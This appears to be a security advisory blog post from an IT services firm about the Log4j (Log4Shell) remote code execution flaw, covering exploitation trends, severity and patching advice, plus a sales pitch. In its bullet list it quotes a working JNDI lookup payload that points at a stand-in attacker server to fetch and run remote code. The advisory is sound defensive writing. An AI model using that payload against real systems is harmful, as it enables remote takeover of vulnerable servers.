, ,

Log4j vulnerability: An update from InfoSystems' Cyber Services Team

Log4j vulnerability: An update from InfoSystems' Cyber Services Team

The InfoSystems Cyber Services team has been working diligently the past week researching and analyzing the new CVE-2021-44228 vulnerability, commonly known as Log4j or Log4Shell. Log4j is a widely used Java logging library prevalent in many different software applications and cloud services.

On December 9, 2021, the Log4j Java library was found to suffer from a critical remote code execution vulnerability. This vulnerability is rated with the highest severity rating of 10.0, and if exploited, allows attackers the ability to take full control of the impacted system.

Initial research into the exploit suggested attackers were leveraging the vulnerability to install crypto-mining software, a tactic known as crypto jacking. Crypto jacking is considered a serious cyber event, but typically crypto jacking is not as destructive as ransomware or other malware InfoSystems has observed recently. In recent days, attackers are exploiting Log4j to install Cobalt Strike and other remote access toolkits which are extremely dangerous ransomware precursors. InfoSystems’ Cyber Services team has witnessed increasing levels of exploitation in the wild and more ransomware attacks are sure to follow as a result.

Log4j is one of the most severe vulnerabilities InfoSystems has observed in recent years for the following reasons:

  • The vulnerable Java code is extremely easy to exploit and is extremely prevalent - used by thousands of applications and cloud services across the globe
  • Due to the prevalence, identifying and patching all vulnerable systems is no easy task for cybersecurity teams
  • It is high-impact – this vulnerability allows for full remote code execution. Remote code execution attacks can allow the adversary unauthorized access to systems where they can make changes, run executable software, install malware, and/or exfiltrate company sensitive data
  • Instructions on how to perform the exploit are publicly available
  • The attacker simply needs to prepare a malicious Java file, store it on a server they control, and include the following string in any data that will be logged by the application server: ${jndi:ldap://attackers-server.com/malicious-java-file}
  • When the vulnerable server logs this string, Log4j will retrieve and execute Java code from an attacker-controlled server, allowing arbitrary code execution. If the code is a remote shell, the attacker will obtain a local shell with the privileges of the system user running the vulnerable application.

The InfoSystems Cyber Services team is currently reviewing our supported products for impact and evaluating options for remediation and/or mitigation. This includes implementing additional proactive measures within InfoSystems and customer internal environments to address the dynamic threats related to CVE-2021-44228.

InfoSystems has not observed successful exploitation of the Log4j vulnerability within our private cloud or customer networks. InfoSystems has also not observed successful exploitation of the Log4j vulnerability within our internal environment. InfoSystems will remain vigilant in threat hunting and deep analysis of the Log4j vulnerability. InfoSystems is actively hunting for indicators of compromise and evidence of vulnerable systems and are reporting this information to customers and partners through private channels.

InfoSystems recommends mitigating any vulnerable systems as soon as possible. Security patches and workarounds are now available for most systems. Please refer to the appropriate vendor documentation for specific instructions on how to remediate the vulnerable systems.

InfoSystems also recommends performing a comprehensive Security Impact Review (SIR) of internal and external environments. This no-cost IT assessment identifies vulnerabilities in your network and IT infrastructure that could lead to a cybersecurity breach. InfoSystems specialists assess your risk, identify areas in need of improvement, and provide remediation recommendations for any discovered cybersecurity deficiencies.

Contact our team today to schedule a Security Impact Review.

About InfoSystems

For over 25 years, InfoSystems has provided reliable IT solutions to build and maintain strong and secure systems for both SMB and enterprise organizations. Headquartered in Chattanooga, TN, our trusted team of experts specialize in traditional infrastructure, IT optimization and cybersecurity services, as well as next gen solutions such as hybrid cloud and automation, from partners such as IBM, Red Hat, Dell Technologies, Microsoft and VMware.

Leave a reply

Your email address will not be published.